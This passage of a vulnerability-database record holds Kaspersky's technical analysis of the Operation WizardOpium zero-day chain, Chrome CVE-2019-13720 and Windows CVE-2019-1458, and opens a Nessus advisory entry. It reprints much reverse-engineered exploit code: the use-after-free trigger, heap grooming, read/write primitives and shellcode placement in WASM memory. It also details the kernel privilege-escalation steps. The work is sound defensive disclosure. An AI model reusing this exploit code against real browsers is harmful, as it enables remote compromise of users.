["CVE-2010-2744", "CVE-2016-7255", "CVE-2019-0859", "CVE-2019-13720", "CVE-2019-1458"], "description": "\n\nBack in October 2019 we detected a classic watering-hole attack on a North Korea-related news site that exploited a chain of Google Chrome and Microsoft Windows zero-days. While we've already published blog posts briefly describing this operation (available [here](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) and [here](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>)), in this blog post we'd like to take a deep technical dive into the exploits and vulnerabilities used in this attack.\n\n## Google Chrome remote code execution exploit\n\nIn the [original blog post](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) we described the exploit loader responsible for initial validation of the target and execution of the next stage JavaScript code containing the full browser exploit. The exploit is huge because, besides code, it contains byte arrays with shellcode, a Portable Executable (PE) file and WebAssembly (WASM) module used in the later stages of exploitation. The exploit abused a vulnerability in the WebAudio OfflineAudioContext interface and was targeting two release builds of Google Chrome 76.0.3809.87 and 77.0.3865.75. However, the vulnerability was introduced long before that and much earlier releases with a WebAudio component are also vulnerable. At the time of our discovery the current version of Google Chrome was 78, and while this version was also affected, the exploit did not support it and had a number of checks to ensure that it would only be executed on affected versions to prevent crashes. After our report, the vulnerability was assigned CVE-2019-13720 and was fixed in version 78.0.3904.87 with the following [commit](<https://chromium.googlesource.com/chromium/src.git/+/6a2e670a243b815cf043f8da4d26ecb9a64d307b>). A use-after-free (UAF) vulnerability, it could be triggered due to a race condition between the Render and Audio threads:\n \n \n if (!buffer) {\n +\tBaseAudioContext::GraphAutoLocker context_locker(Context());\n +\tMutexLocker locker(process_lock_);\n \treverb_.reset();\n \tshared_buffer_ = nullptr;\n \treturn;\n\nAs you can see, when the audio buffer is set to null in ConvolverNode and an active buffer already exists within the Reverb object, the function SetBuffer() can destroy reverb_ and shared_buffer_ objects.\n \n \n class MODULES_EXPORT ConvolverHandler final : public AudioHandler {\n ...\n std::unique_ptr<Reverb> reverb_;\n std::unique_ptr<SharedAudioBuffer> shared_buffer_;\n ...\n\nThese objects might still be in use by the Render thread because there is no proper synchronization between the two threads in the code. A patch added two missing locks (graph lock and process lock) for when the buffer is nullified.\n\nThe exploit code was obfuscated, but we were able to fully reverse engineer it and reveal all the small details. By looking at the code, we can see the author of the exploit has excellent knowledge of the internals of specific Google Chrome components, especially the [PartitionAlloc](<https://github.com/scrapy/base-chromium/blob/master/allocator/partition_allocator/PartitionAlloc.md>) memory allocator. This can clearly be seen from the snippets of reverse engineered code below. These functions are used in the exploit to retrieve useful information from internal structures of the allocator, including: SuperPage address, PartitionPage address by index inside the SuperPage, the index of the used PartitionPage and the address of PartitionPage metadata. All constants are taken from [partition_alloc_constants.h](<https://chromium.googlesource.com/chromium/src/+/master/base/allocator/partition_allocator/partition_alloc_constants.h>):\n \n \n function getSuperPageBase(addr) {\n \tlet superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);\n \tlet superPageBaseMask = ~superPageOffsetMask;\n \tlet superPageBase = addr & superPageBaseMask;\n \treturn superPageBase;\n }\n \n function getPartitionPageBaseWithinSuperPage(addr, partitionPageIndex) {\n \tlet superPageBase = getSuperPageBase(addr);\n \tlet partitionPageBase = partitionPageIndex << BigInt(14);\n \tlet finalAddr = superPageBase + partitionPageBase;\n \treturn finalAddr;\n }\n \n function getPartitionPageIndex(addr) {\n \tlet superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);\n \tlet partitionPageIndex = (addr & superPageOffsetMask) >> BigInt(14);\n \treturn partitionPageIndex;\n }\n \n function getMetadataAreaBaseFromPartitionSuperPage(addr) {\n \tlet superPageBase = getSuperPageBase(addr);\n \tlet systemPageSize = BigInt(0x1000);\n \treturn superPageBase + systemPageSize;\n }\n \n function getPartitionPageMetadataArea(addr) {\n \tlet superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);\n \tlet partitionPageIndex = (addr & superPageOffsetMask) >> BigInt(14);\n \tlet pageMetadataSize = BigInt(0x20);\n \tlet partitionPageMetadataPtr = getMetadataAreaBaseFromPartitionSuperPage(addr) + partitionPageIndex * pageMetadataSize;\n \treturn partitionPageMetadataPtr;\n }\n\nIt's interesting that the exploit also uses the relatively new built-in [BigInt](<https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/BigInt>) class to handle 64-bit values; authors usually use their own primitives in exploits.\n\nAt first, the code initiates OfflineAudioContext and creates a huge number of IIRFilterNode objects that are initialized via two float arrays.\n \n \n let gcPreventer = [];\n let iirFilters = [];\n \n function initialSetup() {\n \tlet audioCtx = new OfflineAudioContext(1, 20, 3000);\n \n \tlet feedForward = new Float64Array(2);\n \tlet feedback = new Float64Array(1);\n \n \tfeedback[0] = 1;\n \tfeedForward[0] = 0;\n \tfeedForward[1] = -1;\n \n \tfor (let i = 0; i < 256; i++)\n iirFilters.push(audioCtx.createIIRFilter(feedForward, feedback));\n }\n\nAfter that, the exploit begins the initial stage of exploitation and tries to trigger a UAF bug. For that to work the exploit creates the objects that are needed for the Reverb component. It creates another huge OfflineAudioContext object and two ConvolverNode objects \u2013 ScriptProcessorNode to start audio processing and AudioBuffer for the audio channel.\n \n \n async function triggerUaF(doneCb) {\n \tlet audioCtx = new OfflineAudioContext(2, 0x400000, 48000);\n \tlet bufferSource = audioCtx.createBufferSource();\n \tlet convolver = audioCtx.createConvolver();\n \tlet scriptNode = audioCtx.createScriptProcessor(0x4000, 1, 1);\n \tlet channelBuffer = audioCtx.createBuffer(1, 1, 48000);\n \n \tconvolver.buffer = channelBuffer;\n \tbufferSource.buffer = channelBuffer;\n \n \tbufferSource.loop = true;\n \tbufferSource.loopStart = 0;\n \tbufferSource.loopEnd = 1;\n \n \tchannelBuffer.getChannelData(0).fill(0);\n \n \tbufferSource.connect(convolver);\n \tconvolver.connect(scriptNode);\n \tscriptNode.connect(audioCtx.destination);\n \n \tbufferSource.start();\n \n \tlet finished = false;\n \n \tscriptNode.onaudioprocess = function(evt) {\n \t\tlet channelDataArray = new Uint32Array(evt.inputBuffer.getChannelData(0).buffer);\n \n \t\tfor (let j = 0; j < channelDataArray.length; j++) {\n \t\tif (j + 1 < channelDataArray.length && channelDataArray[j] != 0 && channelDataArray[j + 1] != 0) {\n \t\t\tlet u64Array = new BigUint64Array(1);\n \t\t\tlet u32Array = new Uint32Array(u64Array.buffer);\n \t\t\tu32Array[0] = channelDataArray[j + 0];\n \t\t\tu32Array[1] = channelDataArray[j + 1];\n \n \t\t\tlet leakedAddr = byteSwapBigInt(u64Array[0]);\n \t\t\tif (leakedAddr >> BigInt(32) > BigInt(0x8000))\n \t\t\tleakedAddr -= BigInt(0x800000000000);\n \t\t\tlet superPageBase = getSuperPageBase(leakedAddr);\n \n \t \t\tif (superPageBase > BigInt(0xFFFFFFFF) && superPageBase < BigInt(0xFFFFFFFFFFFF)) {\n \t\t\tfinished = true;\n \t\t\tevt = null;\n \n \t\t\tbufferSource.disconnect();\n \t\t\tscriptNode.disconnect();\n \t\t\tconvolver.disconnect();\n \n \t\t\tsetTimeout(function() {\n \t\t\tdoneCb(leakedAddr);\n \t\t\t}, 1);\n \n \t\t\treturn;\n \t\t\t}\n \t\t}\n \t\t}\n \t};\n \n \taudioCtx.startRendering().then(function(buffer) {\n \t\tbuffer = null;\n \n \t\tif (!finished) {\n \t \tfinished = true;\n \t \ttriggerUaF(doneCb);\n \t\t}\n \t});\n \n \twhile (!finished) {\n \t\tconvolver.buffer = null;\n \t\tconvolver.buffer = channelBuffer;\n \t\tawait later(100); // wait 100 millseconds\n \t}\n };\n\nThis function is executed recursively. It fills the audio channel buffer with zeros, starts rendering offline and at the same time runs a loop that nullifies and resets the channel buffer of the ConvolverNode object and tries to trigger a bug. The exploit uses the later() function to simulate the Sleep function, suspend the current thread and let the Render and Audio threads finish execution right on time:\n \n \n function later(delay) {\n \treturn new Promise(resolve => setTimeout(resolve, delay));\n }\n\nDuring execution the exploit checks if the audio channel buffer contains any data that differs from the previously set zeroes. The existence of such data would mean the UAF was triggered successfully and at this stage the audio channel buffer should contain a leaked pointer.\n\nThe PartitionAlloc memory allocator has a special exploit mitigation that works as follows: when the memory region is freed, it byteswaps the address of the pointer and after that the byteswapped address is added to the FreeList structure. This complicates exploitation because the attempt to dereference such a pointer will crash the process. To bypass this technique the exploit uses the following primitive that simply swaps the pointer back:\n \n \n function byteSwapBigInt(x) {\n \tlet result = BigInt(0);\n \tlet tmp = x;\n \n \tfor (let i = 0; i < 8; i++) {\n \t\tresult = result << BigInt(8);\n \t\tresult += tmp & BigInt(0xFF);\n \t\ttmp = tmp >> BigInt(8);\n \t}\n \n \treturn result;\n }\n\nThe exploit uses the leaked pointer to get the address of the SuperPage structure and verifies it. If everything goes to plan, then it should be a raw pointer to a temporary_buffer_ object of the ReverbConvolverStage class that is passed to the callback function _initialUAFCallback_.\n \n \n let sharedAudioCtx;\n let iirFilterFeedforwardAllocationPtr;\n \n function initialUAFCallback(addr) {\n \tsharedAudioCtx = new OfflineAudioContext(1, 1, 3000);\n \n \tlet partitionPageIndexDelta = undefined;\n \tswitch (majorVersion) {\n \t\tcase 77: // 77.0.3865.75\n \t \tpartitionPageIndexDelta = BigInt(-26);\n \tbreak;\n \t\tcase 76: // 76.0.3809.87\n \t\tpartitionPageIndexDelta = BigInt(-25);\n \t \tbreak;\n \t}\n \n \tiirFilterFeedforwardAllocationPtr = getPartitionPageBaseWithinSuperPage(addr, getPartitionPageIndex(addr) + partitionPageIndexDelta) + BigInt(0xFF0);\n \n triggerSecondUAF(byteSwapBigInt(iirFilterFeedforwardAllocationPtr), finalUAFCallback);\n }\n\nThe exploit uses the leaked pointer to get the address of the raw pointer to the _feedforward__ array with the AudioArray&lt;double&gt; type that is present in the IIRProcessor object created with IIRFilterNode. This array should be located in the same SuperPage, but in different versions of Chrome this object is created in different PartitionPages and there is a special code inside initialUAFCallback to handle that.\n\nThe vulnerability is actually triggered not once but twice. After the address of the right object is acquired, the vulnerability is exploited again. This time the exploit uses two AudioBuffer objects of different sizes, and the previously retrieved address is sprayed inside the larger AudioBuffer. This function also executes recursively.\n \n \n let floatArray = new Float32Array(10);\n let audioBufferArray1 = [];\n let audioBufferArray2 = [];\n let imageDataArray = [];\n \n async function triggerSecondUAF(addr, doneCb) {\n \tlet counter = 0;\n \tlet numChannels = 1;\n \n \tlet audioCtx = new OfflineAudioContext(1, 0x100000, 48000);\n \n \tlet bufferSource = audioCtx.createBufferSource();\n \tlet convolver = audioCtx.createConvolver();\n \n \tlet bigAudioBuffer = audioCtx.createBuffer(numChannels, 0x100, 48000);\n \tlet smallAudioBuffer = audioCtx.createBuffer(numChannels, 0x2, 48000);\n \n \tsmallAudioBuffer.getChannelData(0).fill(0);\n \n \tfor (let i = 0; i < numChannels; i++) {\n \t\tlet channelDataArray = new BigUint64Array(bigAudioBuffer.getChannelData(i).buffer);\n \t\tchannelDataArray[0] = addr;\n \t}\n \n \tbufferSource.buffer = bigAudioBuffer;\n \tconvolver.buffer = smallAudioBuffer;\n \n \tbufferSource.loop = true;\n \tbufferSource.loopStart = 0;\n \tbufferSource.loopEnd = 1;\n \n \tbufferSource.connect(convolver);\n \tconvolver.connect(audioCtx.destination);\n \n \tbufferSource.start();\n \n \tlet finished = false;\n \n \taudioCtx.startRendering().then(function(buffer) {\n \t\tbuffer = null;\n \n \t\tif (finished) {\n \t\taudioCtx = null;\n \n \t\tsetTimeout(doneCb, 200);\n \t\treturn;\n \t\t} else {\n \t\tfinished = true;\n \n \t\tsetTimeout(function() {\n \t\ttriggerSecondUAF(addr, doneCb);\n \t\t}, 1);\n \t\t}\n \t});\n \n \twhile (!finished) {\n \t\tcounter++;\n \n \t\tconvolver.buffer = null;\n \n \t\tawait later(1); // wait 1 millisecond\n \n \t\tif (finished)\n \t\tbreak;\n \n \t\tfor (let i = 0; i < iirFilters.length; i++) {\n \t\tfloatArray.fill(0);\n \t iirFilters[i].getFrequencyResponse(floatArray, floatArray, floatArray);\n \n \t\tif (floatArray[0] != 3.1415927410125732) {\n \t\t\tfinished = true;\n \n \t \t\taudioBufferArray2.push(audioCtx.createBuffer(1, 1, 10000));\n \t\taudioBufferArray2.push(audioCtx.createBuffer(1, 1, 10000));\n \n \t\t\tbufferSource.disconnect();\n \t\t\tconvolver.disconnect();\n \n \t\t\treturn;\n \t\t}\n \t\t}\n \n \t\tconvolver.buffer = smallAudioBuffer;\n \n \t\tawait later(1); // wait 1 millisecond\n \t}\n }\n\nThis time the exploit uses the function _getFrequencyResponse()_ to check if exploitation was successful. The function creates an array of frequencies that is filled with a Nyquist filter and the source array for the operation is filled with zeroes.\n \n \n void IIRDSPKernel::GetFrequencyResponse(int n_frequencies,\n \tconst float* frequency_hz,\n \tfloat* mag_response,\n \tfloat* phase_response) {\n ...\n Vector<float> frequency(n_frequencies);\n double nyquist = this->Nyquist();\n // Convert from frequency in Hz to normalized frequency (0 -> 1),\n // with 1 equal to the Nyquist frequency.\n for (int k = 0; k < n_frequencies; ++k)\n \tfrequency[k] = frequency_hz[k] / nyquist;\n ...\n\nIf the resulting array contains a value other than **\u03c0****, **it means exploitation was successful. If that's the case, the exploit stops its recursion and executes the function _finalUAFCallback_ to allocate the audio channel buffer again and reclaim the previously freed memory. This function also repairs the heap to prevent possible crashes by allocating various objects of different sizes and performing defragmentation of the heap. The exploit also creates BigUint64Array, which is used later to create an arbitrary read/write primitive.\n \n \n async function finalUAFCallback() {\n \tfor (let i = 0; i < 256; i++) {\n \t\tfloatArray.fill(0);\n \n \tiirFilters[i].getFrequencyResponse(floatArray, floatArray, floatArray);\n \n \t\tif (floatArray[0] != 3.1415927410125732) {\n \t\tawait collectGargabe();\n \n \t\taudioBufferArray2 = [];\n \n \t\tfor (let j = 0; j < 80; j++)\n \t\taudioBufferArray1.push(sharedAudioCtx.createBuffer(1, 2, 10000));\n \n \t\tiirFilters = new Array(1);\n \t \t\tawait collectGargabe();\n \n \t\tfor (let j = 0; j < 336; j++)\n \t\t\timageDataArray.push(new ImageData(1, 2));\n \t\timageDataArray = new Array(10);\n \t\tawait collectGargabe();\n \n \t\tfor (let j = 0; j < audioBufferArray1.length; j++) {\n \t\t\tlet auxArray = new BigUint64Array(audioBufferArray1[j].getChannelData(0).buffer);\n \t\t\tif (auxArray[0] != BigInt(0)) {\n \t\t\tkickPayload(auxArray);\n \t\t\treturn;\n \t\t\t}\n \t\t}\n \n \t\treturn;\n \t\t}\n \t}\n }\n\nHeap defragmentation is performed with multiple calls to the improvised _collectGarbage_ function that creates a huge ArrayBuffer in a loop.\n \n \n function collectGargabe() {\n \tlet promise = new Promise(function(cb) {\n \t\tlet arg;\n \t\tfor (let i = 0; i < 400; i++)\n \t\tnew ArrayBuffer(1024 * 1024 * 60).buffer;\n \t\tcb(arg);\n \t});\n \treturn promise;\n }\n\nAfter those steps, the exploit executes the function _kickPayload()_ passing the previously created BigUint64Array containing the raw pointer address of the previously freed AudioArray's data.\n \n \n async function kickPayload(auxArray) {\n \tlet audioCtx = new OfflineAudioContext(1, 1, 3000);\n \tlet partitionPagePtr = getPartitionPageMetadataArea(byteSwapBigInt(auxArray[0]));\n \tauxArray[0] = byteSwapBigInt(partitionPagePtr);\n \tlet i = 0;\n \tdo {\n \t\tgcPreventer.push(new ArrayBuffer(8));\n \t\tif (++i > 0x100000)\n \t\treturn;\n \t} while (auxArray[0] != BigInt(0));\n \tlet freelist = new BigUint64Array(new ArrayBuffer(8));\n \tgcPreventer.push(freelist);\n \t...\n\nThe exploit manipulates the PartitionPage metadata of the freed object to achieve the following behavior. If the address of another object is written in BigUint64Array at index zero and if a new 8-byte object is created and the value located at index 0 is read back, then a value located at the previously set address will be read. If something is written at index 0 at this stage, then this value will be written to the previously set address instead.\n \n \n function read64(rwHelper, addr) {\n \trwHelper[0] = addr;\n \tvar tmp = new BigUint64Array;\n \ttmp.buffer;\n \tgcPreventer.push(tmp);\n \treturn byteSwapBigInt(rwHelper[0]);\n }\n \n function write64(rwHelper, addr, value) {\n \trwHelper[0] = addr;\n \tvar tmp = new BigUint64Array(1);\n \ttmp.buffer;\n \ttmp[0] = value;\n \tgcPreventer.push(tmp);\n }\n\nAfter the building of the arbitrary read/write primitives comes the final stage \u2013 executing the code. The exploit achieves this by using a popular technique that exploits the Web Assembly (WASM) functionality. Google Chrome currently allocates pages for just-in-time (JIT) compiled code with read/write/execute (RWX) privileges and this can be used to overwrite them with shellcode. At first, the exploit initiates a \"dummy\" WASM module and it results in the allocation of memory pages for JIT compiled code.\n \n \n const wasmBuffer = new Uint8Array([...]);\n const wasmBlob = new Blob([wasmBuffer], {\n \ttype: \"application/wasm\"\n });\n \n const wasmUrl = URL.createObjectURL(wasmBlob);\n var wasmFuncA = undefined;\n WebAssembly.instantiateStreaming(fetch(wasmUrl), {}).then(function(result) {\n \twasmFuncA = result.instance.exports.a;\n });\n\nTo execute the exported function _wasmFuncA_, the exploit creates a FileReader object. When this object is initiated with data it creates a FileReaderLoader object internally. If you can parse PartitionAlloc allocator structures and know the size of the next object that will be allocated, you can predict which address it will be allocated to. The exploit uses the _getPartitionPageFreeListHeadEntryBySlotSize()_ function with the provided size and gets the address of the next free block that will be allocated by FileReaderLoader.\n \n \n let fileReader = new FileReader;\n let fileReaderLoaderSize = 0x140;\n let fileReaderLoaderPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, fileReaderLoaderSize);\n if (!fileReaderLoaderPtr)\n \treturn;\n \n fileReader.readAsArrayBuffer(new Blob([]));\n \n let fileReaderLoaderTestPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, fileReaderLoaderSize);\n if (fileReaderLoaderPtr == fileReaderLoaderTestPtr)\n \treturn;\n\nThe exploit obtains this address twice to find out if the FileReaderLoader object was created and if the exploit can continue execution. The exploit sets the exported WASM function to be a callback for a FileReader event (in this case, an onerror callback) and because the FileReader type is derived from EventTargetWithInlineData, it can be used to get the addresses of all its events and the address of the JIT compiled exported WASM function.\n \n \n fileReader.onerror = wasmFuncA;\n \n let fileReaderPtr = read64(freelist, fileReaderLoaderPtr + BigInt(0x10)) - BigInt(0x68);\n \n let vectorPtr = read64(freelist, fileReaderPtr + BigInt(0x28));\n let registeredEventListenerPtr = read64(freelist, vectorPtr);\n let eventListenerPtr = read64(freelist, registeredEventListenerPtr);\n let eventHandlerPtr = read64(freelist, eventListenerPtr + BigInt(0x8));\n let jsFunctionObjPtr = read64(freelist, eventHandlerPtr + BigInt(0x8));\n \n let jsFunctionPtr = read64(freelist, jsFunctionObjPtr) - BigInt(1);\n let sharedFuncInfoPtr = read64(freelist, jsFunctionPtr + BigInt(0x18)) - BigInt(1);\n let wasmExportedFunctionDataPtr = read64(freelist, sharedFuncInfoPtr + BigInt(0x8)) - BigInt(1);\n let wasmInstancePtr = read64(freelist, wasmExportedFunctionDataPtr + BigInt(0x10)) - BigInt(1);\n \n let stubAddrFieldOffset = undefined;\n switch (majorVersion) {\n \tcase 77:\n \t\tstubAddrFieldOffset = BigInt(0x8) * BigInt(16);\n \tbreak;\n \tcase 76:\n \t\tstubAddrFieldOffset = BigInt(0x8) * BigInt(17);\n \tbreak\n }\n \n let stubAddr = read64(freelist, wasmInstancePtr + stubAddrFieldOffset);\n\nThe variable stubAddr contains the address of the page with the stub code that jumps to the JIT compiled WASM function. At this stage it's sufficient to overwrite it with shellcode. To do so, the exploit uses the function _getPartitionPageFreeListHeadEntryBySlotSize()_ again to find the next free block of 0x20 bytes, which is the size of the structure for the ArrayBuffer object. This object is created when the exploit creates a new audio buffer.\n \n \n let arrayBufferSize = 0x20;\n let arrayBufferPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, arrayBufferSize);\n if (!arrayBufferPtr)\n \treturn;\n \n let audioBuffer = audioCtx.createBuffer(1, 0x400, 6000);\n gcPreventer.push(audioBuffer);\n\nThe exploit uses arbitrary read/write primitives to get the address of the DataHolder class that contains the raw pointer to the data and size of the audio buffer. The exploit overwrites this pointer with stubAddr and sets a huge size.\n \n \n let dataHolderPtr = read64(freelist, arrayBufferPtr + BigInt(0x8));\n \n write64(freelist, dataHolderPtr + BigInt(0x8), stubAddr);\n write64(freelist, dataHolderPtr + BigInt(0x10), BigInt(0xFFFFFFF));\n\nNow all that's needed is to implant a Uint8Array object into the memory of this audio buffer and place shellcode there along with the Portable Executable that will be executed by the shellcode.\n \n \n let payloadArray = new Uint8Array(audioBuffer.getChannelData(0).buffer);\n payloadArray.set(shellcode, 0);\n payloadArray.set(peBinary, shellcode.length);\n\nTo prevent the possibility of a crash the exploit clears the pointer to the top of the FreeList structure used by the PartitionPage.\n \n \n write64(freelist, partitionPagePtr, BigInt(0));\n\nNow, in order to execute the shellcode, it's enough to call the exported WASM function.\n \n \n try {\n \twasmFuncA();\n } catch (e) {}\n\n## Microsoft Windows elevation of privilege exploit\n\nThe shellcode appeared to be a Reflective PE loader for the Portable Executable module that was also present in the exploit. This module mostly consisted of the code to escape Google Chrome's sandbox by exploiting the Windows kernel component win32k for the elevation of privileges and it was also responsible for downloading and executing the actual malware. On closer analysis, we found that the exploited vulnerability was in fact a zero-day. We notified Microsoft Security Response Center and they assigned it CVE-2019-1458 and fixed the vulnerability. The win32k component has something of bad reputation. It has been present since Windows NT 4.0 and, according to Microsoft, it is responsible for more than 50% of all kernel security bugs. In the last two years alone Kaspersky has found five zero-days in the wild that exploited win32k vulnerabilities. That's quite an interesting statistic considering that since the release of Windows 10, Microsoft has implemented a number of mitigations aimed at complicating exploitation of win32k vulnerabilities and the majority of zero-days that we found exploited versions of Microsoft Windows prior to the release of Windows 10 RS4. The elevation of privilege exploit used in Operation WizardOpium was built to support Windows 7, Windows 10 build 10240 and Windows 10 build 14393. It's also important to note that Google Chrome has a special security feature called [Win32k lockdown](<https://googleprojectzero.blogspot.com/2016/11/breaking-chain.html>). This security feature eliminates the whole win32k attack surface by disabling access to win32k syscalls from inside Chrome processes. Unfortunately, Win32k lockdown is only supported on machines running Windows 10. So, it's fair to assume that Operation WizardOpium targeted users running Windows 7.\n\nCVE-2019-1458 is an Arbitrary Pointer Dereference vulnerability. In win32k Window objects are represented by a tagWND structure. There are also a number of classes based on this structure: ScrollBar, Menu, Listbox, Switch and many others. The FNID field of tagWND structure is used to distinguish the type of class. Different classes also have various extra data appended to the tagWND structure. This extra data is basically just different structures that often include kernel pointers. Besides that, in the win32k component there's a syscall SetWindowLongPtr that can be used to set this extra data (after validation of course). It's worth noting that SetWindowLongPtr was related to a number of vulnerabilities in the past (e.g., CVE-2010-2744, CVE-2016-7255, and CVE-2019-0859). There's a [common issue](<https://securelist.com/new-win32k-zero-day-cve-2019-0859/90435/>) when pre-initialized extra data can lead to system procedures incorrectly handling. In the case of CVE-2019-1458, the validation performed by SetWindowLongPtr was just insufficient.\n \n \n xxxSetWindowLongPtr(tagWND *pwnd, int index, QWORD data, ...)\n \t...\n \tif ( (int)index >= gpsi->mpFnid_serverCBWndProc[(pwnd->fnid & 0x3FFF) - 0x29A] - sizeof(tagWND) )\n \t\t...\n \t\textraData = (BYTE*)tagWND + sizeof(tagWND) + index\n \t\told = *(QWORD*)extraData;\n \t\t*(QWORD*)extraData = data;\n \t\treturn old;\n\nA check for the index parameter would have prevented this bug, but prior to the patch the values for FNID_DESKTOP, FNID_SWITCH, FNID_TOOLTIPS inside the mpFnid_serverCBWndProc table were not initialized, rendering this check useless and allowing the kernel pointers inside the extra data to be overwritten.\n\nTriggering the bug is quite simple: at first, you create a Window, then NtUserMessageCall can be used to call any system class window procedure.\n \n \n gpsi->mpFnidPfn[(dwType + 6) & 0x1F]((tagWND *)wnd, msg, wParam, lParam, resultInfo);\n\nIt's important to provide the right message and dwType parameters. The message needs to be equal to WM_CREATE. dwType is converted to fnIndex internally with the following calculation: (dwType + 6) &amp; 0x1F. The exploit uses a dwType equal to 0xE0. It results in an fnIndex equal to 6 which is the function index of _xxxSwitchWndProc _and the WM_CREATE message sets the FNID field to be equal to FNID_SWITCH.\n \n \n LRESULT xxxSwitchWndProc(tagWND *wnd, UINT msg, WPARAM wParam, LPARAM lParam)\n {\n ...\n pti = *(tagTHREADINFO **)&gptiCurrent;\n if ( wnd->fnid != FNID_SWITCH )\n {\n if ( wnd->fnid || wnd->cbwndExtra + 296 < (unsigned int)gpsi->mpFnid_serverCBWndProc[6] )\n return 0i64;\n if ( msg != 1 )\n return xxxDefWindowProc(wnd, msg, wParam, lParam);\n if ( wnd[1].head.h )\n return 0i64;\n wnd->fnid = FNID_SWITCH;\n }\n switch ( msg )\n {\n case WM_CREATE:\n zzzSetCursor(wnd->pcls->spcur, pti, 0i64);\n break;\n case WM_CLOSE:\n xxxSetWindowPos(wnd, 0, 0);\n xxxCancelCoolSwitch();\n break;\n case WM_ERASEBKGND:\n case WM_FULLSCREEN:\n pti->ptl = (_TL *)&pti->ptl;\n ++wnd->head.cLockObj;\n xxxPaintSwitchWindow(wnd, pti, 0i64);\n ThreadUnlock1();\n return 0i64;\n }\n return xxxDefWindowProc(wnd, msg, wParam, lParam);\n }\n\nThe vulnerability in _NtUserSetWindowLongPtr_ can then be used to overwrite the extra data at index zero, which happens to be a pointer to a structure containing information about the Switch Window. In other words, the vulnerability makes it possible to set some arbitrary kernel pointer that will be treated as this structure.\n\nAt this stage it's enough to call _NtUserMessageCall_ again, but this time with a message equal to WM_ERASEBKGND. This results in the execution of the function _xxxPaintSwitchWindow_ that increments and decrements a couple of integers located by the pointer that we previously set.\n \n \n sub [rdi+60h], ebx\n add [rdi+68h], ebx\n ...\n sub [rdi+5Ch], ecx\n add [rdi+64h], ecx\n\nAn important condition for triggering the exploitable code path is that the ALT key needs to be pressed.\n\nExploitation is performed by abusing Bitmaps. For successful exploitation a few Bitmaps need to be allocated next to each other, and their kernel addresses need to be known. To achieve this, the exploit uses two common kernel ASLR bypass techniques. For Windows 7 and Windows 10 build 10240 (Threshold 1) the Bitmap kernel addresses are leaked via the GdiSharedHandleTable [technique](<https://www.coresecurity.com/blog/abusing-gdi-for-ring0-exploit-primitives>): in older versions of the OS there is a special table available in the user level that holds the kernel addresses of all GDI objects present in the process. This particular technique was patched in Windows 10 build 14393 (Redstone 1), so for this version the exploit uses another common [technique](<https://labs.f-secure.com/archive/a-tale-of-bitmaps/>) that abuses Accelerator Tables (patched in Redstone 2). It involves creating a Create Accelerator Table object, leaking its kernel address from the gSharedInfo HandleTable available in the user level, and then freeing the Accelerator Table object and allocating a Bitmap reusing the same memory address.\n\nThe whole exploitation process works as follows: the exploit creates three bitmaps located next to each other and their addresses are leaked. The exploit prepares Switch Window and uses a vulnerability in NtUserSetWindowLongPtr to set an address pointing near the end of the first Bitmap as Switch Window extra data. Bitmaps are represented by a SURFOBJ structure and the previously set address needs to be calculated in a way that will make the xxxPaintSwitchWindow function increment the sizlBitmap field of the SURFOBJ structure for the Bitmap allocated next to the first one. The sizlBitmap field indicates the bounds of the pixel data buffer and the incremented value will allow the use of the function SetBitmapBits() to perform an out-of-bounds write and overwrite the SURFOBJ of the third Bitmap object.\n\nThe pvScan0 field of the SURFOBJ structure is an address of the pixel data buffer, so the ability to overwrite it with an arbitrary pointer results in arbitrary read/write primitives via the functions GetBitmapBits()/SetBitmapBits(). The exploit uses these primitives to parse the EPROCESS structure and steal the system token. To get the kernel address of the EPROCESS structure, the exploit uses the function [EnumDeviceDrivers](<https://docs.microsoft.com/en-us/windows/win32/api/psapi/nf-psapi-enumdevicedrivers>). This function works according to its MSDN description and it provides a list of kernel addresses for currently loaded drivers. The first address in the list is the address of ntkrnl and to get the offset to the EPROCESS structure the exploit parses an executable in search for the exported PsInitialSystemProcess variable.\n\nIt's worth noting that this technique still works in the latest versions of Windows (tested with Windows 10 19H1 build 18362). Stealing the system token is the most common post exploitation technique that we see in the majority of elevation of privilege exploits. After acquiring system privileges the exploit downloads and executes the actual malware.\n\n## Conclusions\n\nIt was particularly interesting for us to examine the Chrome exploit because it was the first Google Chrome in-the-wild zero-day encountered for a while. It was also interesting that it was used in combination with an elevation of privilege exploit that didn't allow exploitation on the latest versions of Windows mostly due to the Win32k lockdown security feature of Google Chrome. With regards to privilege elevation, it was also interesting that we found another 1-day exploit for this vulnerability just one week after the patch, indicating how simple it is to exploit this vulnerability.\n\n_We would like to thank the Google Chrome and Microsoft security teams for fixing these vulnerabilities so quickly. Google was generous enough to offer a bounty for CVE-2019-13720. The reward was donated to charity and Google matched the donation._", "modified": "2020-05-28T10:00:09", "published": "2020-05-28T10:00:09", "id": "SECURELIST:FED90A1B8959D4636DBADB1E135F7BF7", "href": "https://securelist.com/the-zero-day-exploits-of-operation-wizardopium/97086/", "type": "securelist", "title": "The zero-day exploits of Operation WizardOpium", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-03-01T06:19:02", "description": "The remote Windows host is missing a security update. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n Windows kernel that allows a local attacker, via a\n specially crafted application, to bypass the Address\n Space Layout Randomization (ASLR) feature and retrieve\n the memory address of a kernel object. (CVE-2016-7214)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Windows kernel-mode driver due to improper handling\n of objects in memory. A local attacker can exploit\n these, via a specially crafted application, to execute\n arbitrary code in kernel mode. (CVE-2016-7215,\n CVE-2016-7246, CVE-2016-7255)\n\n - An information disclosure vulnerability exists in the\n bowser.sys kernel-mode driver due to improper handling\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to disclose\n sensitive information. (CVE-2016-7218)", "edition": 35, 